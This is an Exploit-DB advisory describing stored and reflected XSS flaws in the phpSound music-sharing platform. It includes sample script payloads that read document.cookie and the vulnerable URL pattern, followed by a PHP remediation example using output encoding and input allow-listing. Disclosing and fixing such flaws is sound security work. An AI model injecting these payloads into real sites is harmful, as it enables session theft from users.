exploit-db-mirror/exploits/php/webapps/35198.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00


# Exploit Title: phpSound Music Sharing Platform Multiple XSS Vulnerabilities
# Date: 08-10-2014
# Exploit Author: Halil Dalabasmaz
# Version: v1.0.5
# Vendor Link: http://codecanyon.net/item/phpsound-music-sharing-platform/9016117
# Software Test Link: http://phpsound.com/demo
# Vulnerabilities Description:
===Stored XSS===
Create a Playlist; any XSS payload entered in the "Title" or "Description" input field will then run.
Sample Payload for Stored XSS: "><script>alert(document.cookie);</script>
Solution
Filter the input fields against XSS attacks.
===
===Reflected XSS===
The URL parameter "filter" is not filtered.
http://server/path/index.php?a=explore&filter=XSS
Sample Payload for XSS: </title><script>alert(document.cookie);</script>
Solution
Filter the parameter against XSS attacks.
===
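
One way to apply both "Solution" items above, as an added example that is not phpSound code and not part of the original advisory: encode stored and reflected values at output time and validate "filter" against an allow-list. The helper names e() and clean_filter(), the allow-list pattern and the surrounding markup are assumptions for illustration.

```php
<?php
declare(strict_types=1);

// Added example with hypothetical helper names; not taken from phpSound.

/**
 * Encode untrusted text for HTML element content or a quoted attribute value.
 * ENT_QUOTES covers both quote characters, so the value cannot close the
 * attribute; < and > are encoded, so it cannot close <title> or open a tag.
 */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/**
 * Allow-list for the "filter" URL parameter: letters, digits, space,
 * underscore and hyphen, at most 32 characters (pattern is an assumption).
 * Anything else is replaced by the empty string.
 */
function clean_filter(?string $raw): string
{
    $raw = $raw ?? '';
    return preg_match('/\A[\p{L}\p{N} _-]{1,32}\z/u', $raw) === 1 ? $raw : '';
}

// Constructed inputs: the two sample payloads quoted in the advisory.
$playlistTitle = '"><script>alert(document.cookie);</script>';        // stored value
$filter        = '</title><script>alert(document.cookie);</script>';  // ?filter=...

// Reflected case: validate first, then still encode when writing the page.
$safeFilter = clean_filter($filter);

// Stored case: keep the raw text in the database and encode on every output.
$page = '<title>Explore ' . e($safeFilter) . '</title>' . "\n"
      . '<input name="title" value="' . e($playlistTitle) . '">' . "\n";

echo $page;
```

Encoding at output rather than stripping characters at input keeps the stored playlist text intact and protects every page that later renders it.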